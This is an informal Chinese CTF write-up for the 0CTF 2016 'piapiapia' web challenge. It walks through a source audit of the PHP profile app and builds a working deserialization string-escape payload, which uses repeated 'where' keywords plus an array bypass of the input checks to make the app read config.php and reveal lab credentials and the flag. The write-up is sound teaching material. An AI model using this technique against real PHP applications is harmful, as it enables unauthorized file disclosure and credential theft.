你爹刷题3

你👱🏻‍寒假打了几次比赛,但是做出来的题跟打的比赛次数差不多

你👱🏻‍太拉胯了,只能继续看题

否则你👱🏻‍只能从CTF的世界里Get Out了

你👱🏻‍现在开学进入下赛季了,但是还是得刷点题

[0CTF 2016]piapiapia

你👱🏻‍打开题目是这样

用dirsearch扫一下,扫到www.zip

下载

里面的源码一个一个审计

其中,在config文件里面你👱🏻‍发现了flag和username为root

尝试用root为username进行登陆,而意外进入的注册页面,注册完成后再进行登录,成功后进入update.php界面

这是profile的php部分源码

<?php
require_once('class.php');
if($_SESSION['username'] == null) {
    die('Login First');    
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile  == null) {
    header('Location: update.php');
}
else {
    $profile = unserialize($profile);
    $phone = $profile['phone'];
    $email = $profile['email'];
    $nickname = $profile['nickname'];
    $photo = base64_encode(file_get_contents($profile['photo']));
?>

在profile文件里面发现了敏感函数,unserialize,file_get_contents

<?php
require_once('class.php');
if($_SESSION['username'] == null) {
    die('Login First');    
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

    $username = $_SESSION['username'];
    if(!preg_match('/^\d{11}$/', $_POST['phone']))
        die('Invalid phone');

    if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
        die('Invalid email');
    
    if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
        die('Invalid nickname');

    $file = $_FILES['photo'];
    if($file['size'] < 5 or $file['size'] > 1000000)
        die('Photo size error');

    move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
    $profile['phone'] = $_POST['phone'];
    $profile['email'] = $_POST['email'];
    $profile['nickname'] = $_POST['nickname'];
    $profile['photo'] = 'upload/' . md5($file['name']);

    $user->update_profile($username, serialize($profile));
    echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>

在update文件里面发现了serialize

你👱🏻‍:这代码审计也忒多了

这里应该是要让file_get_contents请求config.php文件

看一下这个参数的传递过程

1.在profile.php里，它是$profile数组里键名为photo的键值

  $photo = base64_encode(file_get_contents($profile['photo']));

2.$profile又是通过$user的show_profile函数传过来的，而且传过去了$username参数：

$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile  == null) {
    header('Location: update.php');
}

3.跟进class.php,user类中

public function show_profile($username) {
    $username = parent::filter($username);

    $where = "username = '$username'";
    $object = parent::select($this->table, $where);
    return $object->profile;
}

4.user类继承了mysql类，这里先调用了父类的filter函数。
这里是替换字符串中的单引号和反斜杠为下划线 ，并且替换多个字符串为hacker。
implode函数是表示把数组拼接起来，拼接符是 “|”：

 public function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}

5.然后show_profile里面又调用了父类的select函数：

public function select($table, $where, $ret = '*') {
    $sql = "SELECT $ret FROM $table WHERE $where";
    $result = mysql_query($sql, $this->link);
    return mysql_fetch_object($result);
}

6.可以看到数据是从表里取出来的,在select函数的下面找到相关函数：

public function update($table, $key, $value, $where) {
    $sql = "UPDATE $table SET $key = '$value' WHERE $where";
    return mysql_query($sql);
}

7.再查看哪里调用了这个函数

     public function update_profile($username, $new_profile) {
    $username = parent::filter($username);
    $new_profile = parent::filter($new_profile);

    $where = "username = '$username'";
    return parent::update($this->table, 'profile', $new_profile, $where);
}

8.再找update_profile的调用

    move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
    $profile['phone'] = $_POST['phone'];
    $profile['email'] = $_POST['email'];
    $profile['nickname'] = $_POST['nickname'];
    $profile['photo'] = 'upload/' . md5($file['name']);

    $user->update_profile($username, serialize($profile));
    echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {

9.这里对profile进行的赋值,通过POST进行参数的传递

总结为

profile.php的file_get_contents =》 show_profile() =》 class.php里的select() =》 mysql类 =》 class.php里的update() =》 update_profile() =》 update.php里调用传参。

现在一步一步进行绕过

对于photo参数

    $file = $_FILES['photo'];
    if($file['size'] < 5 or $file['size'] > 1000000)
        die('Photo size error');
    move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
    $profile['phone'] = $_POST['phone'];
    $profile['email'] = $_POST['email'];
    $profile['nickname'] = $_POST['nickname'];
    $profile['photo'] = 'upload/' . md5($file['name']);

对photo进行了大小限制,并且对它进行了md5

这意味着我们不能直接传了

但是我们可以利用它的前一个参数nickname

这里就要利用到序列化的拼接+伪造，对nickname参数攻击，比如该序列化字符串：

 a:3:{s:4:"dddd";s:6:"ddddhm";}

我们在dddd的地方输入 dddd”;s:10:“buhaobuhao”;} 就变成了：

 a:3:{s:25:"dddd";s:10:"buhaobuhao";}";s:6:"ddddhm";}

但是相应的，dddd前面的字符串长度也变了，变成25了，所以这里会报错。我们就要想办法把dddd变成25位长度，还差21位。

之前的mysql类里面有个filter()函数对参数值进行了处理替换：

insert\select\update\delete都是6位长度，hacker也是6位长度，where是5位长度，而且执行的是替换操作。那么我们岂不是可以通过替换操作，把原本5位长度的where，替换成了6位的hacker

那这样我们就变长了一位，而且preg_replace函数默认是替换所有的。那么我们差几位，就输入几个where硬刷长度

还有nickname的过滤

    if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
        die('Invalid nickname');

这里先对它进行了正则，这个正则的意思是匹配除了a-zA-Z0-9_之外的字符,因为 “^” 符号是在 “[]” 里面，所以是非的意思,不是开始的意思。

然后 “||” 后面判断了它的长度是否大于10

这里考虑用数组绕过

这里可牵一张表

md5(Array()) = null
sha1(Array()) = null
ereg(pattern,Array()) =null
preg_match(pattern,Array()) = false
strcmp(Array(), “abc”) =null
strpos(Array(),“abc”) = null
strlen(Array()) = null

所以传入数组就能绕过

所以构造

nickname[]=where";}s:5:"photo";s:10:"config.php";}

前面多了个“}”,是因为构造传入的nickname是数组

比如

       <?php
function filter($str){
return str_replace('bb', 'ccc', $str);
}
class A{
public $name='aaaa';
public $pass='123456';
public $nickname = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut');
 }
$AA=new A();
echo serialize($AA)."\n";
// $res=filter(serialize($AA));
// $c=unserialize($res);
// echo $c->pass;
?>

结果为

O:1:"A":3:{s:4:"name";s:4:"aaaa";s:4:"pass";s:6:"123456";s:8:"nickname";a:3:{s:1:"a";s:5:"Apple";s:1:"b";s:6:"banana";s:1:"c";s:7:"Coconut";}}

可以看到在数组出发生了闭合

这个时候，我们的nickname[]数组实际长度是39位，除了where，多出来了34位。这个时候strlen(‘where’) == 5 != 39，不是指定的长度会报错，所以我们要想办法把where那块地方，在序列化之后（注意时间点）再增长34位

那我们就输入34个where增长34位

所以最后的payload为

 wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

进入到注册页面

登陆后,在profile页面进行抓包

F12进入profile.php链接看到一串base64编码后的字符串

进行解密得到

<?php
 $config['hostname'] = '127.0.0.1';
 $config['username'] = 'root';
 $config['password'] = 'qwertyuiop';
 $config['database'] = 'challenges';
$flag = 'flag{7591a142-a543-47ec-b893-0bd28044b39f}';
?>

你👱🏻‍做了一天,中间几个地方蚌埠住了去看了wp才做出来,属于是顶级